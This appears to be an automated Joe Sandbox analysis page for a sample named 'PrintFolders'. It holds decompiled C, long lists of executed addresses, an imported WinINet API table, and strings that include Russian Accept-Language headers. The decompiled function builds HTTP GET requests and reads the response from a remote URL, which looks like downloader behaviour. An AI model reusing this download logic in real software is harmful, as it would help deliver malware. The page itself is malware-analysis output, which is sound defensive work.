															E10005BC0( &(( >=  ? _v52 :  &_v52)[_t638]),  &(( &(( >=  ? _v52 :  &_v52)[_t638]))[ <  ? _t476 : 7]), _t515 - _t638 + 1);
															_t499 = _v36;
															_t671 = _t671 + 0xc;
															goto L54;
														}
													}
												} else {
													goto L49;
												}
												goto L146;
												L49:
												_t638 = E1000F670(_t638 + 1, 0x68, _v108 - _t638 + 1);
												_t671 = _t671 + 0xc;
												__eflags = _t638;
											} while (_t638 != 0);
										}
										goto L54;
									}
								} else {
									goto L18;
								}
							}
						}
					}
				}
				L146:
			}

0x10001013
0x10001015
0x10001020
0x10001021
0x10001027
0x1000102c
0x1000102e
0x10001031
0x10001034
0x10001038
0x1000103e
0x10001040
0x10001044
0x10001047
0x1000104d
0x1000107c
0x1000104f
0x1000104f
0x10001054
0x1000105b
0x10001060
0x10001063
0x10001066
0x1000106d
0x1000106d
0x1000108b
0x10001095
0x100010a0
0x100010b4
0x100010ba
0x100010c0
0x100010c2
0x100010c7
0x100010cd
0x100010d3
0x100010d5
0x100010da
0x100010db
0x100010e6
0x100010ee
0x100010f6
0x100010fb
0x10001101
0x10001104
0x10001107
0x10001107
0x1000110d
0x10001120
0x1000112d
0x10001132
0x10001150
0x100014b5
0x100014bb
0x100014cb
0x100014d3
0x100014d4
0x100014d5
0x100014e3
0x10001156
0x1000115c
0x10001170
0x10001176
0x10001181
0x10001189
0x00000000
0x1000119c
0x1000119c
0x100011a2
0x100011ac
0x100011b6
0x100011b9
0x100011c3
0x100011ca
0x100011d0
0x100011d0
0x100011d2
0x100011d3
0x100011df
0x100011e0
0x100011e7
0x100011ec
0x100011ff
0x10001205
0x1000120f
0x1000121e
0x10001224
0x10001228
0x10001238
0x10001239
0x1000123e
0x10001241
0x10001254
0x1000125c
0x1000126a
0x1000126c
0x1000126e
0x1000127a
0x10001284
0x1000128e
0x10001295
0x10001295
0x100012a0
0x100012a0
0x100012a3
0x100012a6
0x100012b7
0x100012bd
0x100012c2
0x100012c5
0x100012cf
0x100012e3
0x100012f3
0x100012f6
0x100012fa
0x100012fc
0x10001305
0x1000133c
0x1000133e
0x10001345
0x1000134b
0x10001355
0x1000135f
0x10001369
0x1000139a
0x1000139c
0x100013a2
0x100013a9
0x100013bf
0x100013c1
0x100013c2
0x100013cd
0x100013d3
0x100013d9
0x100013e3
0x100013e5
0x100013ef
0x100013f7
0x100013fe
0x10001404
0x10001405
0x1000140b
0x1000140c
0x10001410
0x10001411
0x10001419
0x1000141a
0x1000141b
0x1000141d
0x10001423
0x10001425
0x1000142b
0x1000142e
0x10001431
0x10001433
0x10001435
0x1000143b
0x1000143c
0x1000143f
0x10001449
0x1000144a
0x1000144f
0x10001457
0x1000145c
0x1000145f
0x10001462
0x10001468
0x10001468
0x10001470
0x10001471
0x10001477
0x1000147c
0x10001487
0x1000148c
0x1000148c
0x10001495
0x1000149a
0x100014a6
0x100014a6
0x100013a9
0x100014a9
0x100014b2
0x00000000
0x1000136b
0x1000136b
0x10001371
0x10001372
0x1000137a
0x10001390
0x10001390
0x10001392
0x10001397
0x00000000
0x1000137c
0x1000137c
0x1000137f
0x1000138a
0x00000000
0x00000000
0x00000000
0x00000000
0x1000138a
0x1000137a
0x10001307
0x10001307
0x1000130d
0x10001314
0x1000131c
0x10001332
0x10001332
0x10001334
0x10001339
0x00000000
0x1000131e
0x1000131e
0x10001321
0x1000132c
0x100014e6
0x100014e6
0x100014eb
0x100014ec
0x100014ed
0x100014ee
0x100014ef
0x100014f0
0x100014f1
0x100014f3
0x100014f5
0x10001500
0x10001501
0x10001504
0x10001509
0x10001509
0x1000150b
0x1000150e
0x1000150f
0x10001510
0x10001511
0x10001515
0x1000151b
0x1000151e
0x10001521
0x10001523
0x1000152a
0x1000152d
0x10001534
0x1000153b
0x1000153e
0x10001542
0x10001542
0x10001544
0x10001545
0x10001545
0x1000154b
0x1000154c
0x10001550
0x10001555
0x1000155f
0x10001563
0x10001566
0x1000156a
0x1000156d
0x10001570
0x10001649
0x10001649
0x10001650
0x10001654
0x10001656
0x1000166e
0x1000166e
0x1000166e
0x10001658
0x10001661
0x10001663
0x10001666
0x10001668
0x00000000
0x1000166a
0x1000166a
0x1000166a
0x10001668
0x10001671
0x10001673
0x1000167c
0x10001683
0x10001686
0x1000168d
0x10001694
0x10001695
0x1000169c
0x1000169d
0x100016a1
0x100016a6
0x100016ad
0x100016b0
0x100016b2
0x100016b5
0x100016b9
0x100016bd
0x100016bf
0x100016c9
0x100016ce
0x100016d4
0x100016d6
0x100016e1
0x100016ea
0x100016f2
0x100016fa
0x10001709
0x1000170b
0x1000170e
0x10001710
0x100018ac
0x100018ac
0x100018b1
0x100018b3
0x100018b6
0x100018b9
0x100018e3
0x100018e3
0x100018e6
0x100018ed
0x100018f4
0x100018f8
0x100018fb
0x10001925
0x1000192a
0x10001932
0x10001933
0x10001934
0x10001938
0x10001942
0x100018fd
0x100018fd
0x10001900
0x10001901
0x10001903
0x10001909
0x1000191b
0x1000191b
0x1000191d
0x00000000
0x1000190b
0x1000190b
0x1000190e
0x10001916
0x10001919
0x00000000
0x00000000
0x00000000
0x00000000
0x10001919
0x10001909
0x100018bb
0x100018bb
0x100018be
0x100018bf
0x100018c1
0x100018c7
0x100018d9
0x100018d9
0x100018db
0x100018e0
0x00000000
0x100018c9
0x100018c9
0x100018cc
0x100018d4
0x100018d7
0x00000000
0x00000000
0x00000000
0x00000000
0x100018d7
0x100018c7
0x10001716
0x1000171b
0x10001726
0x1000172c
0x10001735
0x10001746
0x1000174c
0x10001752
0x10001755
0x10001757
0x100018a9
0x100018aa
0x00000000
0x1000175d
0x1000175d
0x10001766
0x1000177f
0x10001781
0x10001783
0x100018a1
0x100018a4
0x100018a6
0x00000000
0x10001789
0x10001789
0x1000178b
0x10001795
0x1000179a
0x100017a1
0x100017a8
0x100017ac
0x100017b1
0x100017b8
0x100017bc
0x100017c2
0x100017d0
0x100017d2
0x100017d4
0x100017dc
0x100017e1
0x100017f0
0x100017f6
0x100017f8
0x100017fa
0x10001802
0x10001807
0x10001816
0x1000181c
0x1000181e
0x10001820
0x10001828
0x1000182d
0x1000183c
0x10001842
0x10001844
0x10001848
0x1000184b
0x1000184e
0x1000187c
0x10001885
0x1000188b
0x1000188d
0x10001892
0x10001893
0x10001898
0x10001898
0x1000189c
0x1000189e
0x00000000
0x10001850
0x10001850
0x10001853
0x10001854
0x10001856
0x1000185c
0x10001872
0x10001872
0x10001874
0x10001879
0x00000000
0x1000185e
0x1000185e
0x10001861
0x10001869
0x1000186c
0x00000000
0x00000000
0x00000000
0x00000000
0x1000186c
0x1000185c
0x1000184e
0x10001783
0x10001757
0x10001576
0x10001576
0x1000157b
0x10001589
0x1000158b
0x1000158e
0x10001590
0x10001596
0x100015a0
0x100015a0
0x100015a2
0x100015a7
0x100015ae
0x100015b0
0x100015b2
0x100015b5
0x100015b8
0x100015b8
0x100015b8
0x100015bb
0x100015bd
0x100015bf
0x100015e2
0x100015e2
0x100015e4
0x100015e4
0x100015c1
0x100015c1
0x100015c4
0x100015c7
0x00000000
0x100015c9
0x100015c9
0x100015cc
0x100015cf
0x00000000
0x100015d1
0x100015d1
0x100015d4
0x100015de
0x100015de
0x100015d6
0x100015d6
0x100015d9
0x100015dc
0x00000000
0x00000000
0x00000000
0x00000000
0x100015dc
0x100015d4
0x100015cf
0x100015c7
0x100015e7
0x100015e9
0x10001605
0x10001608
0x1000160b
0x00000000
0x1000160d
0x1000160d
0x1000160f
0x10001945
0x1000194a
0x1000194a
0x1000194f
0x1000194f
0x10001954
0x10001955
0x10001956
0x10001957
0x10001958
0x10001959
0x1000195a
0x1000195b
0x1000195c
0x1000195d
0x1000195e
0x1000195f
0x10001960
0x10001965
0x1000196a
0x1000196b
0x1000196c
0x1000196d
0x1000196e
0x1000196f
0x10001970
0x10001971
0x10001973
0x10001976
0x10001979
0x1000197a
0x1000197d
0x1000197e
0x10001980
0x10001983
0x10001984
0x10001987
0x1000198a
0x1000198c
0x100019b4
0x100019ba
0x10001a91
0x10001a91
0x00000000
0x100019c0
0x100019c2
0x100019c5
0x100019cb
0x100019fc
0x100019fc
0x10001a01
0x00000000
0x100019cd
0x100019d4
0x100019d8
0x100019da
0x00000000
0x100019dc
0x100019dc
0x100019df
0x100019e1
0x100019e4
0x100019e7
0x100019ed
0x10001a20
0x10001a22
0x10001a2f
0x10001a2f
0x10001a24
0x10001a24
0x10001a25
0x10001a2a
0x10001a2a
0x00000000
0x100019ef
0x100019ef
0x100019f2
0x100019f4
0x10001a96
0x10001a96
0x10001a9b
0x10001a9c
0x10001a9d
0x10001a9e
0x10001a9f
0x10001aa0
0x10001aa1
0x10001aa3
0x10001aa6
0x10001aa9
0x10001aac
0x10001aad
0x10001aae
0x10001aaf
0x10001ab1
0x10001ab4
0x10001ab7
0x10001aba
0x10001abd
0x10001abf
0x10001aec
0x10001af1
0x10001bea
0x10001bea
0x00000000
0x10001af7
0x10001af9
0x10001afc
0x10001b02
0x10001b17
0x10001b1b
0x10001b1d
0x10001b2b
0x10001b2e
0x10001b30
0x10001b33
0x10001b36
0x10001b3b
0x00000000
0x10001b41
0x10001b41
0x10001b43
0x10001b48
0x10001b71
0x10001b73
0x10001b82
0x10001b82
0x10001b75
0x10001b75
0x10001b76
0x10001b7b
0x10001b7e
0x10001b7e
0x00000000
0x00000000
0x00000000
0x00000000
0x10001b48
0x10001b1f
0x10001b1f
0x10001b24
0x00000000
0x10001b24
0x10001b04
0x10001b04
0x10001b09
0x10001b4a
0x10001b4a
0x10001b4a
0x10001b4d
0x10001b4f
0x10001be5
0x10001be5
0x00000000
0x10001b55
0x10001b55
0x10001b56
0x10001b5b
0x10001b5e
0x10001b60
0x10001bef
0x10001bef
0x10001bf4
0x10001bf5
0x10001bf6
0x10001bf7
0x10001bf8
0x10001bf9
0x10001bfa
0x10001bfb
0x10001bfc
0x10001bfd
0x10001bfe
0x10001bff
0x10001c00
0x10001c03
0x10001c04
0x10001c07
0x10001c08
0x10001c0a
0x10001c0c
0x10001c14
0x10001c16
0x10001c31
0x10001c32
0x10001c35
0x10001c37
0x10001c4f
0x10001c53
0x10001c5b
0x10001c5d
0x10001c79
0x10001c7b
0x00000000
0x10001c7d
0x10001c82
0x10001c88
0x10001c96
0x10001c96
0x10001c5f
0x10001c64
0x10001c6a
0x10001c6f
0x10001c78
0x10001c78
0x10001c39
0x10001c39
0x10001c3b
0x00000000
0x10001c3d
0x10001c40
0x10001c48
0x10001c4e
0x10001c4e
0x10001c3b
0x10001c18
0x10001c1d
0x10001c23
0x10001c30
0x10001c30
0x10001c0e
0x10001c0f
0x10001c13
0x10001c13
0x10001b66
0x10001b66
0x10001b69
0x10001b6c
0x10001b84
0x10001b84
0x10001b87
0x10001b8a
0x10001b8d
0x10001b95
0x10001b9c
0x10001b9f
0x10001ba3
0x10001ba6
0x10001ba9
0x10001bd8
0x10001bd8
0x10001be2
0x10001bab
0x10001bab
0x10001bb2
0x10001bb4
0x10001bba
0x10001bce
0x10001bce
0x10001bd0
0x00000000
0x10001bbc
0x10001bbc
0x10001bbf
0x10001bc7
0x10001bca
0x00000000
0x10001bcc
0x10001bcc
0x00000000
0x10001bcc
0x10001bca
0x10001bba
0x10001ba9
0x10001b60
0x10001b4f
0x10001b02
0x10001ac1
0x10001ac1
0x10001ac3
0x10001ac6
0x10001ac8
0x10001ac8
0x10001aca
0x10001acd
0x10001ad3
0x10001adb
0x10001add
0x10001ae9
0x10001ae9
0x100019fa
0x10001a06
0x10001a06
0x10001a0c
0x10001a0e
0x10001a11
0x10001a13
0x10001a8c
0x10001a8c
0x00000000
0x10001a15
0x10001a15
0x10001a18
0x10001a1b
0x10001a31
0x10001a35
0x10001a39
0x10001a3c
0x10001a3f
0x10001a44
0x10001a47
0x10001a4a
0x10001a4d
0x10001a51
0x10001a54
0x10001a7f
0x10001a7f
0x10001a89
0x10001a56
0x10001a56
0x10001a59
0x10001a5b
0x10001a61
0x10001a75
0x10001a75
0x10001a77
0x00000000
0x10001a63
0x10001a63
0x10001a66
0x10001a6e
0x10001a71
0x00000000
0x10001a73
0x10001a73
0x00000000
0x10001a73
0x10001a71
0x10001a61
0x10001a54
0x10001a13
0x100019f4
0x100019ed
0x100019da
0x100019cb
0x1000198e
0x1000198e
0x10001990
0x10001993
0x10001995
0x10001995
0x1000199a
0x1000199d
0x100019a5
0x100019b1
0x100019b1
0x10001615
0x1000161a
0x10001621
0x10001623
0x10001626
0x1000162a
0x1000162e
0x10001630
0x10001632
0x10001637
0x1000163e
0x10001643
0x10001646
0x00000000
0x10001646
0x1000160f
0x00000000
0x00000000
0x00000000
0x00000000
0x100015eb
0x100015fa
0x100015fc
0x100015ff
0x100015ff
0x10001603
0x00000000
0x10001590
0x00000000
0x00000000
0x00000000
0x1000132c
0x1000131c
0x10001305
0x10001189
0x00000000

APIs

InternetSetFilePointer.WININET(10001898,00000000,00000000,00000000,00000000), ref: 10001095
InternetReadFile.WININET(10001898,00000000,000003E8,00000000), ref: 100010B4
HttpQueryInfoA.WININET(10001898,0000001D,?,00000103,00000000), ref: 10001148
CoCreateInstance.OLE32(?,00000000,00000001,100101B0,?), ref: 10001181
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,?,?), ref: 10001224
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 1000126A
__cftof.LIBCMT ref: 100016EA
InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 10001703
InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001726
InternetConnectA.WININET(00000000,00000000,00000050,?,?,00000003,00000000,00000001), ref: 10001746
HttpOpenRequestA.WININET(00000000,GET,00000000,00000000,00000000,00000000,80400000,00000001), ref: 10001779
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 100017D0
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 100017F6
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 1000181C
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 10001842
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 10001885
InternetCloseHandle.WININET(00000000), ref: 1000189C
InternetCloseHandle.WININET(?), ref: 100018A4
InternetCloseHandle.WININET(00000000), ref: 100018AA

Strings

Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 10001795
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 100017D4
http://, xrefs: 100015A2
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 100017FA
GET, xrefs: 10001773
text, xrefs: 100012EC
invalid string position, xrefs: 10001960
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001820

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: Internet$Http$Request$Headers$CloseHandle$ByteCharFileMultiOpenWide$ConnectCreateInfoInstanceOptionPointerQueryReadSend__cftof
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$invalid string position$text
API String ID: 3831252183-349387645
Opcode ID: 928840d67b81dec85a459f9b0e9ad04d7454cd60734cdd5e754f0154346cdfd8
Instruction ID: 9cfefb4acadf1673c11eeb4d9e0c75330180c00a45bf6efb74ded1e1255f97de
Opcode Fuzzy Hash: 928840d67b81dec85a459f9b0e9ad04d7454cd60734cdd5e754f0154346cdfd8
Instruction Fuzzy Hash: 7D52B171E00218AFEB25CF68CC85BEEB7B9FF48340F504198E509AB295DB75AA45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 100014F0 Relevance: 33.6, APIs: 13, Strings: 6, Instructions: 363
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E100014F0(long __ecx, intOrPtr _a4) {
				char* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				unsigned int _v28;
				char* _v32;
				char* _v48;
				intOrPtr _v52;
				long _v56;
				char* _v72;
				void _v76;
				intOrPtr _v80;
				char* _v84;
				char* _v100;
				char* _v104;
				void* _v108;
				long _v112;
				void* _v116;
				signed int _v168;
				intOrPtr _v172;
				intOrPtr _v188;
				unsigned int _v192;
				signed int _v196;
				unsigned int _v200;
				signed int _v212;
				unsigned int _v216;
				unsigned int _v220;
				unsigned int _v224;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t165;
				signed int _t166;
				intOrPtr _t168;
				char* _t171;
				void** _t184;
				signed int _t193;
				void* _t211;
				void** _t212;
				unsigned int _t214;
				signed int _t215;
				signed int _t218;
				unsigned int _t220;
				signed int _t224;
				unsigned int _t225;
				void* _t229;
				signed int _t233;
				intOrPtr _t235;
				unsigned int _t237;
				void* _t243;
				char* _t246;
				void* _t254;
				char* _t272;
				char* _t273;
				signed int _t284;
				signed int _t285;
				void* _t287;
				void _t294;
				char* _t295;
				intOrPtr _t296;
				signed int _t298;
				void* _t299;
				signed int _t300;
				unsigned int _t301;
				unsigned int _t307;
				char* _t311;
				intOrPtr* _t315;
				void* _t319;
				void** _t329;
				unsigned int _t330;
				unsigned int _t331;
				void* _t332;
				void* _t333;
				char* _t334;
				char* _t342;
				void* _t346;
				intOrPtr _t347;
				unsigned int _t348;
				unsigned int _t349;
				void* _t352;
				intOrPtr _t353;
				void* _t354;
				void* _t359;
				void* _t361;
				unsigned int _t362;
				unsigned int _t363;
				signed int _t372;
				void* _t374;
				signed int _t376;
				signed int _t377;
				void* _t379;
				void* _t380;
				void** _t381;
				unsigned int _t382;
				signed int _t389;
				void* _t391;
				signed int _t396;
				void* _t397;
				void* _t398;
				void* _t400;
				void* _t401;
				void* _t403;
				void* _t405;
				void* _t406;

				_push(0xffffffff);
				_push(E1000F78D);
				_push( *[fs:0x0]);
				_t401 = _t400 - 0x68;
				_t165 =  *0x10017004; // 0x79eab102
				_t166 = _t165 ^ _t396;
				_v24 = _t166;
				_push(_t376);
				_push(_t166);
				 *[fs:0x0] =  &_v16;
				_v112 = __ecx;
				_t294 = _a4;
				_t315 = _t294;
				_v48 = 0;
				_v76 = _t294;
				_v32 = 0;
				_v28 = 0xf;
				_t346 = _t315 + 1;
				_v48 = 0;
				do {
					_t168 =  *_t315;
					_t315 = _t315 + 1;
				} while (_t168 != 0);
				_push(_t315 - _t346);
				_push(_t294);
				L49();
				_v8 = 0;
				_t295 = _v32;
				_t319 =  >=  ? _v48 :  &_v48;
				_v108 = _t319;
				if(_t295 < 7) {
					L20:
					_t359 =  >=  ? _v48 :  &_v48;
					if(_t295 == 0) {
						L23:
						_t377 = _t376 | 0xffffffff;
						__eflags = _t377;
					} else {
						_t376 = E1000F670(_t359, 0x2f, _t295);
						_t401 = _t401 + 0xc;
						if(_t376 == 0) {
							goto L23;
						} else {
							_t377 = _t376 - _t359;
						}
					}
					_v100 = 0;
					_v84 = 0;
					_t321 =  <  ? _t295 : _t377;
					_v80 = 0xf;
					_push( <  ? _t295 : _t377);
					_t170 =  >=  ? _v48 :  &_v48;
					_push( >=  ? _v48 :  &_v48);
					_v100 = 0;
					L49();
					_v8 = 1;
					_t171 = _v32;
					_t378 =  <  ? _t171 : _t377;
					_t324 =  >=  ? _v48 :  &_v48;
					_t172 = _t171 - ( <  ? _t171 : _t377);
					_v32 = _t171 - ( <  ? _t171 : _t377);
					E10005BC0( >=  ? _v48 :  &_v48,  &(( >=  ? _v48 :  &_v48)[ <  ? _t171 : _t377]), _t171 - ( <  ? _t171 : _t377) + 1);
					_t296 = _v112;
					_t360 = 0;
					_v104 = 0;
					_t55 = _t296 + 0x44; // 0x74cb59b4
					E10006419(_t55, 0x104, _v76, 0x103);
					_t403 = _t401 + 0x1c;
					asm("sbb eax, eax");
					_t379 = InternetOpenA( *(_t296 + 0xc),  ~( *(_t296 + 0x38)) & 0x00000003,  *(_t296 + 0x38), 0, 0);
					_v108 = _t379;
					if(_t379 == 0) {
						L36:
						_t347 = _v80;
						_t298 = 0 | _t360 > 0x00000000;
						if(_t347 < 0x10) {
							L40:
							_t348 = _v28;
							_v84 = 0;
							_v80 = 0xf;
							_v100 = 0;
							if(_t348 < 0x10) {
								L44:
								 *[fs:0x0] = _v16;
								_pop(_t361);
								_pop(_t380);
								_pop(_t299);
								return E100031FF(_t298, _t299, _v24 ^ _t396, _t348, _t361, _t380);
							} else {
								_t329 = _v48;
								_t348 = _t348 + 1;
								_t184 = _t329;
								if(_t348 < 0x1000) {
									L43:
									_push(_t348);
									E10003216(_t329);
									goto L44;
								} else {
									_t329 =  *(_t329 - 4);
									_t348 = _t348 + 0x23;
									if(_t184 - _t329 + 0xfffffffc > 0x1f) {
										goto L47;
									} else {
										goto L43;
									}
								}
							}
						} else {
							_t334 = _v100;
							_t352 = _t347 + 1;
							_t246 = _t334;
							if(_t352 < 0x1000) {
								L39:
								_push(_t352);
								E10003216(_t334);
								_t403 = _t403 + 8;
								goto L40;
							} else {
								_t329 =  *(_t334 - 4);
								_t348 = _t352 + 0x23;
								if(_t246 - _t329 + 0xfffffffc > 0x1f) {
									goto L47;
								} else {
									goto L39;
								}
							}
						}
					} else {
						_v76 = 1;
						InternetSetOptionA(_t379, 0x41,  &_v76, 4);
						_t253 =  >=  ? _v100 :  &_v100;
						_t254 = InternetConnectA(_t379,  >=  ? _v100 :  &_v100, 0x50,  *(_t296 + 0x3c),  *(_t296 + 0x40), 3, 0, 1);
						_t298 = InternetCloseHandle;
						_v116 = _t254;
						if(_t254 == 0) {
							L35:
							InternetCloseHandle(_t379);
							goto L36;
						} else {
							_t336 =  >=  ? _v48 :  &_v48;
							_t360 = HttpOpenRequestA(_t254, "GET",  >=  ? _v48 :  &_v48, 0, 0, 0, 0x80400000, 1);
							if(_t360 == 0) {
								L34:
								InternetCloseHandle(_v116);
								_t360 = _v104;
								goto L35;
							} else {
								_push(0x7d);
								_v72 = 0;
								_push("Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1");
								_v56 = 0;
								_v52 = 0xf;
								_v72 = 0;
								L49();
								_v8 = 2;
								_t379 = HttpAddRequestHeadersA;
								_t259 =  >=  ? _v72 :  &_v72;
								HttpAddRequestHeadersA(_t360,  >=  ? _v72 :  &_v72, _v56, 0x20000000);
								_push(0x28);
								_push("Accept-Language: ru-RU,ru;q=0.9,en;q=0.8");
								L49();
								_t262 =  >=  ? _v72 :  &_v72;
								HttpAddRequestHeadersA(_t360,  >=  ? _v72 :  &_v72, _v56, 0x20000000);
								_push(0x32);
								_push("Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1");
								L49();
								_t265 =  >=  ? _v72 :  &_v72;
								HttpAddRequestHeadersA(_t360,  >=  ? _v72 :  &_v72, _v56, 0x20000000);
								_push(0x37);
								_push("Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0");
								L49();
								_t268 =  >=  ? _v72 :  &_v72;
								HttpAddRequestHeadersA(_t360,  >=  ? _v72 :  &_v72, _v56, 0x20000000);
								_v8 = 1;
								_t353 = _v52;
								if(_t353 < 0x10) {
									L31:
									if(HttpSendRequestA(_t360, 0, 0, 0, 0) != 0) {
										_push(_t360); // executed
										_t272 = E10001010(_v112); // executed
										_v104 = _t272;
									}
									InternetCloseHandle(_t360);
									_t379 = _v108;
									goto L34;
								} else {
									_t342 = _v72;
									_t354 = _t353 + 1;
									_t273 = _t342;
									if(_t354 < 0x1000) {
										L30:
										_push(_t354);
										E10003216(_t342);
										_t403 = _t403 + 8;
										goto L31;
									} else {
										_t329 =  *(_t342 - 4);
										_t348 = _t354 + 0x23;
										if(_t273 - _t329 + 0xfffffffc > 0x1f) {
											goto L46;
										} else {
											goto L30;
										}
									}
								}
							}
						}
					}
				} else {
					_t18 = _t295 - 6; // -6
					_v104 = _t18 + _t319;
					_t376 = E1000F670(_t319, 0x68, _t18 + _t319 - _t319);
					_t401 = _t401 + 0xc;
					if(_t376 != 0) {
						asm("o16 nop [eax+eax]");
						do {
							_t329 = _t376;
							_t348 = "http://";
							_t360 = 3;
							if( *_t329 ==  *_t348) {
								_t329 =  &(_t329[1]);
								_t348 = _t348 + 4;
								_t360 = 0xffffffffffffffff;
							}
							_t284 =  *_t329;
							if(_t284 !=  *_t348) {
								L13:
								asm("sbb eax, eax");
								_t285 = _t284 | 0x00000001;
								__eflags = _t285;
							} else {
								_t284 = _t329[0];
								if(_t284 !=  *(_t348 + 1)) {
									goto L13;
								} else {
									_t284 = _t329[0];
									if(_t284 !=  *((intOrPtr*)(_t348 + 2))) {
										goto L13;
									} else {
										if(_t360 == 0xffffffff) {
											L12:
											_t285 = 0;
										} else {
											_t284 = _t329[0];
											if(_t284 !=  *((intOrPtr*)(_t348 + 3))) {
												goto L13;
											} else {
												goto L12;
											}
										}
									}
								}
							}
							if(_t285 == 0) {
								_t376 = _t376 - _v108;
								__eflags = _t376 - 0xffffffff;
								if(_t376 == 0xffffffff) {
									goto L20;
								} else {
									__eflags = _t295 - _t376;
									if(__eflags < 0) {
										L48();
										L46:
										E1000633C(_t298, _t329, _t348, __eflags);
										L47:
										E1000633C(_t298, _t329, _t348, __eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push("invalid string position");
										E100031DF(_t298, _t348, _t360, _t379);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t396);
										_t397 = _t403;
										_t405 = _t403 - 0xc;
										_t190 = _v172;
										_push(_t298);
										_t300 = _v168;
										_push(_t379);
										_t381 = _t329;
										_v188 = _v172;
										_push(_t360);
										_t330 = _t381[5];
										_v192 = _t330;
										__eflags = _t300 - _t330;
										if(_t300 > _t330) {
											__eflags = _t300 - 0x7fffffff;
											if(_t300 > 0x7fffffff) {
												L72:
												E10001CA0(_t330);
												goto L73;
											} else {
												_t372 = _t300 | 0x0000000f;
												__eflags = _t372 - 0x7fffffff;
												if(__eflags > 0) {
													L59:
													_t360 = 0x7fffffff;
													_t229 = 0x80000023;
													goto L60;
												} else {
													_t348 = _t330 >> 1;
													__eflags = _t330 - 0x7fffffff - _t348;
													if(__eflags > 0) {
														goto L59;
													} else {
														_t243 = _t348 + _t330;
														__eflags = _t372 - _t243;
														_t360 =  <  ? _t243 : _t372;
														_t330 = _t360 + 1;
														__eflags = _t330 - 0x1000;
														if(_t330 < 0x1000) {
															__eflags = _t330;
															if(__eflags == 0) {
																_t233 = 0;
																__eflags = 0;
															} else {
																_push(_t330);
																_t233 = E10003229(_t300, _t360, _t381, __eflags);
																_t405 = _t405 + 4;
															}
															goto L65;
														} else {
															_t229 = _t330 + 0x23;
															__eflags = _t229 - _t330;
															if(__eflags <= 0) {
																L73:
																E10001DE0(_t300);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t397);
																_t398 = _t405;
																_t406 = _t405 - 0xc;
																_t193 = _v196;
																_t349 = _v200;
																_push(_t300);
																_push(_t381);
																_push(_t360);
																_t362 = _t330;
																_v216 = _t349;
																_v212 = _t193;
																_t331 =  *(_t362 + 0x14);
																_v220 = _t331;
																__eflags = _t193 - _t331;
																if(_t193 > _t331) {
																	__eflags = _t193 - 0x7ffffffe;
																	if(__eflags > 0) {
																		L98:
																		E10001CA0(_t331);
																		goto L99;
																	} else {
																		_t389 = _t193 | 0x00000007;
																		__eflags = _t389 - 0x7ffffffe;
																		if(_t389 <= 0x7ffffffe) {
																			_t349 = _t331 >> 1;
																			__eflags = _t331 - 0x7ffffffe - _t349;
																			if(_t331 <= 0x7ffffffe - _t349) {
																				_t211 = _t349 + _t331;
																				__eflags = _t389 - _t211;
																				_t381 =  <  ? _t211 : _t389;
																				_t212 =  &(_t381[0]);
																				__eflags = _t212 - 0x7fffffff;
																				if(_t212 > 0x7fffffff) {
																					goto L97;
																				} else {
																					_t214 = _t212 + _t212;
																					__eflags = _t214 - 0x1000;
																					if(_t214 < 0x1000) {
																						__eflags = _t214;
																						if(__eflags == 0) {
																							_t300 = 0;
																							__eflags = 0;
																						} else {
																							_push(_t214);
																							_t224 = E10003229(_t300, _t362, _t381, __eflags);
																							_t406 = _t406 + 4;
																							_t300 = _t224;
																						}
																						goto L91;
																					} else {
																						goto L85;
																					}
																				}
																			} else {
																				_t381 = 0x7ffffffe;
																				_t214 = 0xfffffffe;
																				goto L85;
																			}
																		} else {
																			_t381 = 0x7ffffffe;
																			_t214 = 0xfffffffe;
																			L85:
																			_t149 = _t214 + 0x23; // 0x100000021
																			_t331 = _t149;
																			__eflags = _t331 - _t214;
																			if(__eflags <= 0) {
																				L97:
																				E10001DE0(_t300);
																				goto L98;
																			} else {
